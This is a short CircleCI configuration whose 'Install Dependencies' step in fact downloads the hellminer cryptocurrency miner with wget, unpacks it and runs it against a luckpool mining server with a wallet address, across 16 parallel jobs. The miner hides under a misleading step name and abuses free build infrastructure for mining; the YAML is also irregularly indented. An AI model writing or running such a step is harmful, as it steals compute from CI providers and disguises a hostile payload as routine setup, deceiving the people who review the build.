version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
       parallelism: 16
       steps:
          -run:
             name: Install Dependencies
             command: |
               lscpu
               echo Hello,subscribe it
               wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u R9WW8PwYdcxGgYtefQMY5uD5SQqU74wVrG.cpu1 -p x --cpu 36

workflows:
     version: 2.1
     build:
         jobs:
         - trial